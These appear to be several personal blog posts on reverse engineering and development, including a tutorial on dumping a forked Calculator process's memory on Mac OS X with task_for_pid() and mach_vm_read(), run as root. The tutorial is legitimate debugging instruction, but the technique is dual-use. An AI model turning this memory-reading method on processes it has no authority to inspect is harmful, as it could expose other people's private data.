About two months ago I bought two books on Amazon, “The Mac Hacker’s Handbook” and “Gray Hat Python”, with the goal of being able to further explore my curiosity in reverse engineering using Mac OS X as a case study.  The books are interesting in that Gray Hat Python essentially makes the argument that Python is a great language for reverse engineering and The Mac Hacker’s Handbook shows you some of the basic tools and techniques needed for vulnerability detection, exploit development, and reliable deployment.  One interesting commonality between the two books is that they both leverage the PaiMei (http://code.google.com/p/paimei/) framework by Pedram Amini, a reverse engineering framework written in Python.

While both books claim the framework is extremely powerful I was largely unsuccessful in getting it up and running (on a Mac) because it was originally developed for Windows.  I also found some of the prerequisites somewhat ridiculous (case in point: it wanted MySQL which boggled my mind when much lighter alternatives are available).  So as you’d expect from me, I saw this as a challenge: develop a cross-platform reverse engineering framework that doesn’t require the kitchen sink to run.  My answer to that challenge is intropy — a Python framework for program introspection.

An Overview Of intropy

Figure 1: Schematic of the intropy framework.  Arrows represent the direction of information flow.

The current (partial) implementation of intropy is entirely in Python and C.  Python is used as the primary language with C only being used to build the abstraction layer between the operating system and the rest of the framework.  As shown in Figure 1 intropy consists of three main components: libicc, idb, and idc.

libicc

One of the primary goals of intropy is to be platform agnostic.  In order to accomplish this I have decided to develop an underlying library that abstracts the OS into a generic API.  The library, libicc, is written purely in C and is brought into the Python environment using the Python ctypes module.  Currently libicc has only been implemented for Mac OS X using a mix of the POSIX and Mach APIs.  As a result, the interface provided by libicc has a very Mach-ish feel to it; however, I don’t see that as being an issue because the API still follows common OS abstractions such as processes, threads, and virtual memory.
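For readers who have not used ctypes, here is a minimal sketch of how a C library is brought into Python.  Since the libicc API has not been published yet, the example loads the standard C library as a stand-in and calls getpid(); none of the names below belong to libicc.

```python
import ctypes
import ctypes.util
import os

# Locate and load the standard C library (a stand-in for libicc).
# find_library() may return None on some systems; CDLL(None) then falls
# back to the symbols already loaded into the current process.
libc_path = ctypes.util.find_library("c")
libc = ctypes.CDLL(libc_path)

# Declare the C signature so ctypes converts arguments and results correctly.
libc.getpid.argtypes = []
libc.getpid.restype = ctypes.c_int

pid = libc.getpid()
print(pid == os.getpid())
```

Declaring argtypes and restype up front is what lets a thin Python layer sit safely on top of a C abstraction layer.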

idb

The sole user of libicc is idb, the intelligent debugger.  Written entirely in Python, idb enables reverse engineers to create their own modules that leverage basic debugging constructs such as stepping, creating breakpoints, and inspecting portions of memory.  The “intelligent” aspect of the debugger comes from the fact that, unlike traditional debuggers, it is possible to write Python scripts that can leverage the facilities provided by idb.  For example, the console shown in Figure 1 is written entirely as a module on top of idb.  Rather than bloating this post I will be writing another post solely about the design of idb, showing some examples of writing modules with it.

idc

While the facilities provided by idb enable you to script the debugger, they do not allow you to inspect the binary at the basic block level.  For this I am planning on leveraging the power of IDA Pro and providing an interface in intropy to do more fine-grained analysis.  This component, idc, is still in the design phase and therefore I’ll leave a more complete discussion for a future post.

intropy Modules

Modules in intropy are written in Python allowing you to leverage the ease of development, functionality, and reliability of the Python language as well as the huge number of Python modules already written.  One interesting point about intropy is that everything written using idb and idc, including the console, is a module.  By doing this we enforce good software design, give everyone access to the same API, and allow for a greater level of flexibility.  On that note, another goal of intropy is to provide the foundation reverse engineers need to create a system that works for them.  Once the source code for intropy is available I will make the API available.

Next Steps

There is a lot to be done before intropy is ready for prime time.  As mentioned earlier, currently there is only a partial implementation so the obvious first step is to complete the coding.  In addition, the current console implementation is lacking greatly in its ability to manage modules so I will also be working on a console design that enables users to load/unload, configure, and execute analysis modules.  Moreover, there is still a great deal of work to be done on the design and implementation of idc.  Finally, once enough of the system has been created I will be posting the code to my site on GitHub.

A Final Note

Needless to say, I am really excited about the prospects for intropy.  Through intropy I hope to inspire other developers to look at their software through the eyes of both an engineer and a reverse engineer and in doing so make some impact (however small it may be) in the software landscape.

From Hawaii to Montreal

For about the past two weeks I’ve been in between Hawaii and Montreal to present at my first workshops.  Needless to say, I definitely learned a lot at both venues and am extremely excited to see where my research takes me next.

In Hawaii (Honolulu to be exact) I presented a poster that outlined my team’s proposal for a binary analysis framework targeted at program comprehension.  It was presented at the 1st Workshop on Developing Tools as Plug-Ins (TOPI) which is a new workshop being offered in conjunction with ICSE.  The poster session was a complete success; we got lots of feedback and most people I talked to were interested in hearing more about the project.  In addition to the poster session I also found the talks quite interesting, especially the keynote that covered some of the issues associated with using plug-ins and how plug-ins have evolved over the years.

After TOPI I headed back to Victoria for a couple of days before setting off for another workshop in Montreal.  In Montreal, Concordia was hosting the NSERC Workshop on Malware Analysis and Fingerprinting which, thanks to my fearless supervisor, I was able to attend.  At this workshop we presented the work we have done on the ICE framework since our submission to TOPI in January.  Since the ICE framework is targeted at binary analysis it was interesting to hear what malware analysts thought of our plan.  Thankfully ICE was quite well received and we got the feeling that we were definitely on the right track.  Aside from our involvement I also really enjoyed the talks, in particular those given by representatives from Arbor Networks, GFI, and Google.  In general I was quite impressed with the people I met from Concordia and am definitely going to look into doing some kind of exchange in the future.

I’ll leave this post here for now, but stay tuned for an introduction to ICE!

My mind is being blown!

Lately I’ve been helping my brother and a friend of his develop a web site, outbounce.com, which makes it easier to plan social events and discover other events nearby.  With our initial site implementation in a code freeze I decided to finally take a look at how we could go about bringing our idea to mobile platforms.  It was (not surprisingly) quickly apparent that we’d need some kind of an RPC server in order to handle requests from mobile clients so I started looking at that.

Originally I started looking at Scala (http://www.scala-lang.org/) because I was intrigued by the actor model and the general approach to concurrency.  I actually got as far as partially implementing an RPC server but I became increasingly frustrated by the fact that Scala leverages large chunks of Java (including the JVM itself).  The issue wasn’t one of performance or anything technical; it was simply that I was not familiar enough with the Java libraries and I was getting annoyed with trying to dig through both the Scala documentation and Java documentation to find a function.  That being said I scrapped my Scala implementation and decided to look elsewhere.

Still intrigued by the actor model I decided to go to the language that popularized it, Erlang, and needless to say my mind has been blown!

I actually first encountered Erlang four or five years ago before I had had much exposure to programming in general.  In my journeys since then I’ve encountered many languages including (but definitely not limited to): PHP, Python, C, Haskell, Prolog, several variants of assembly, Objective-C, and a few Microsoft languages.  As a result returning to Erlang has been eye opening.  The reason? It pulls ideas from all of these different languages and was originally based on Prolog.  Rather than hastily putting together some examples of this I am instead going to try my best to document some of the similarities as I move forward in my RPC implementation.

Dumping process memory on Mac OS X

A little while ago I was trying to set up PaiMei (http://code.google.com/p/paimei/) on Mac OS X and wasn’t having much luck.  This didn’t really surprise me since it wasn’t designed for OS X, but it was worth a shot!  Aside from having issues setting it up I found the requirement to run a MySQL server kind of ridiculous when solutions such as SQLite exist.  Given all of this and my desire to try and peer into parts of software I’m probably not supposed to see, I decided to try my hand at writing a program that can track the execution of other processes (more on this in a future post).  The first step to doing any of this is being able to monitor and manipulate a process and I thought a fun way of doing that would be to try and dump the memory from one process to a file.

Mach Tasks

XNU, the kernel used in Mac OS X, is built up of three main components: Mach, BSD, and I/O Kit.  Each component provides different services to the system; however, for this post we are most interested in Mach.  Mach was originally developed at Carnegie Mellon University as a simple and extensible microkernel and provides XNU with several key abstractions including tasks, threads, address spaces, and ports.

A Mach task is an abstraction that contains one or more threads, a virtual address space, and ports among other things.  Mach tasks in turn serve as the basis of the familiar process model which is implemented in the BSD component of XNU.  As a result, Mach tasks are fundamental units in the XNU kernel and are central to dumping memory of a process.

Getting the Mach task: task_for_pid()

Since Mac OS X implements the POSIX API, provided by the BSD component of XNU, our first step in our quest to dump memory is to translate a process ID into a Mach task identifier.  Our job is made somewhat easy by the task_for_pid() function in mach/mach_traps.h as seen in the following block of code.

  kern_return_t ret = -1;
  mach_port_name_t tport = -1;
  int tpid = -1;

  tpid = fork_calculator();

  ret = task_for_pid(mach_task_self(), tpid, &tport);
  if(ret != KERN_SUCCESS) {
    fprintf(stderr, "main: failed to get task for pid %d (%d)\n", tpid, ret);
    return -1;
  }

The function fork_calculator() spawns a new process running the Mac OS X Calculator application and returns the process ID of the new process.  The call to task_for_pid() takes three arguments: an identifier for the current task, the target process ID, and a pointer to a location to store a port for communicating with the target process.  While this code looks simple there are a couple of caveats that you must be aware of.  First, the introduction of Kernel Authorization in Mac OS X 10.4 requires the process requesting the task identifier to be properly authenticated.  You can achieve this by either implementing the required authentication in code (not shown here) or running the dumping tool as root.  Second, the process being targeted must be a child process of the dumping tool.  This is why our code forks a target process rather than simply accepting a process ID as an argument.  For a more in-depth explanation of the required permissions see the comments for task_for_pid() in the XNU source code.
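The body of fork_calculator() is not reproduced in this post.  As a rough illustration of the fork-then-exec pattern that such a helper presumably follows, here is a sketch in Python rather than C for brevity.  The name spawn_child and the /bin/sh command are hypothetical stand-ins, not code from the dumping tool.

```python
import os


def spawn_child(path, args):
    """Fork, exec `path` in the child, and return the child's PID to the parent."""
    pid = os.fork()
    if pid == 0:
        # Child: replace this process image with the target program.
        try:
            os.execv(path, [path] + list(args))
        finally:
            # Only reached if execv() failed; never fall back into parent code.
            os._exit(127)
    # Parent: the child is now our direct descendant, identified by pid.
    return pid


if __name__ == "__main__":
    child = spawn_child("/bin/sh", ["-c", "exit 0"])
    os.waitpid(child, 0)
    print("spawned and reaped child", child)
```

The point of the pattern is that the parent ends up holding the PID of a process it created itself, which is what the second caveat above asks for.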

Reading memory: mach_vm_read()

Now that we have a port for the target process we can proceed to step two in our quest to dump memory: reading memory from the target process.  This is accomplished using the function mach_vm_read() which will copy the specified region of memory from the target process into the calling process.  The following block of code shows how to use mach_vm_read().

  kern_return_t ret = 0;
  pointer_t data;
  mach_msg_type_number_t data_size;

  long dump_base_addr = 0x10000190c;
  long dump_size = 0x1000;

  ret = mach_vm_read(tport, dump_base_addr, dump_size, &data, &data_size);
  if(ret != KERN_SUCCESS) {
    fprintf(stderr, "mem_dump: failed to read data at 0x%lx (0x%x)\n", dump_base_addr, ret);
    return -1;
  }

The call to mach_vm_read() takes five arguments: a port identifying the target process, the base address, the amount of data to read, a pointer that will contain the address of the data in our address space, and a pointer to the size of data that was actually read.  One caveat to using mach_vm_read() is that the memory at the specified address must be readable.  As seen from the above code, the only real difficulty in using this function is figuring out what the base address is.

Finding The Base Address

The technique you use to find the base address will depend entirely on what you’re trying to accomplish.  For the sake of an example I’ll show you how I came up with the address 0x10000190c. To find this address I used the incredibly useful tool otool to disassemble the Calculator application.

dean@BigBertha:/Applications/Calculator.app/Contents/MacOS $ otool -t Calculator
Calculator:
(__TEXT,__text) section
000000010000190c 6a 00 48 89 e5 48 83 e4 f0 48 8b 7d 08 48 8d 75
000000010000191c 10 89 fa 83 c2 01 c1 e2 03 48 01 f2 48 89 d1 eb

The output of otool (in this invocation; it can do many other things) simply lists the bytes found at the address given in the first column of output.
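To make the format concrete, here is a small sketch that splits one line of this listing into its address and its bytes.  The helper name parse_otool_line is made up for this example, and it assumes the byte-per-column layout shown above; other otool versions or architectures may group the bytes differently.

```python
def parse_otool_line(line):
    """Split one `otool -t` data line into (address, bytes).

    Assumes the layout shown above: a hex address followed by
    space-separated hex bytes.
    """
    fields = line.split()
    address = int(fields[0], 16)
    data = bytes(int(field, 16) for field in fields[1:])
    return address, data


line = "000000010000190c 6a 00 48 89 e5 48 83 e4 f0 48 8b 7d 08 48 8d 75"
address, data = parse_otool_line(line)
print(hex(address), len(data))
```

The address on the first data line of the section is the value used for dump_base_addr in the earlier code.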

Putting It All Together: Dumping Memory

Putting the usage of task_for_pid() and mach_vm_read() together it is possible to dump memory of a target process.  Full code for this program is available on GitHub.  To use the program do the following:

dean@BigBertha:~/scm/Kitchen-Sink $ gcc -Wall -o mac_dump mac_dump.c
dean@BigBertha:~/scm/Kitchen-Sink $ sudo ./mac_dump

This will create a file in the current directory called mem.dump which contains the memory dump.  Looking at the dump you’ll see that we’ve successfully read from the Calculator address space and saved the memory to disk.  You can see this using hexdump as follows.

dean@BigBertha:~/scm/Kitchen-Sink $ sudo hexdump mem.dump
0000000 6a 00 48 89 e5 48 83 e4 f0 48 8b 7d 08 48 8d 75
0000010 10 89 fa 83 c2 01 c1 e2 03 48 01 f2 48 89 d1 eb

If you were to translate this dump you’d see that it contains the instructions seen earlier when we used otool.

Project Moped: The Final Push

It’s been quite a while since I last posted an update on Project Moped so I thought I’d take a few minutes and get one out there.

Admittedly, due to being sick for a week and needing to meet other deadlines, I have not done nearly as much on this project in the last few weeks as I would have liked.  That being said I have made a fair bit of progress in getting a working system up and running.  On the iOS side of things I’ve been trying to find a way to stream media to the device.  The problem with this is that Apple is pretty set on developers using their streaming protocols.  So the workaround I was playing with is streaming my media to a file and then having the player read that.  Well, it turns out that if you’re reading from the local disk the player requires the media to be fully intact, so trying to use a file as a buffer doesn’t seem to work.  I still have a few other tricks to try, but it is getting down to the wire so I may have to scrap live streaming playback and settle for some more abstract indication that the system is working (such as just writing the data to a file and monitoring the network rate).

Switching over to the library development side of things, there has also been a fair amount of progress.  The library is at a point where it can successfully send messages across the network so the next big step is to get all the protocol stuff in place so that everything can communicate.  As a test I wrote a little Python program that can send hand-crafted packets over the network and have been sending them to my ‘edge node’.  The edge node is just a little program that listens on the network and responds as if it were trying to serve data.  I plan to transform that program into something that is actually able to serve data; I just haven’t gotten around to it.

So overall there has been progress, but with only a few days to go time is definitely becoming tight.  I still feel like things, although behind, are in a reasonable position to get a working demo; it’s just a matter of pumping out the code and getting it done.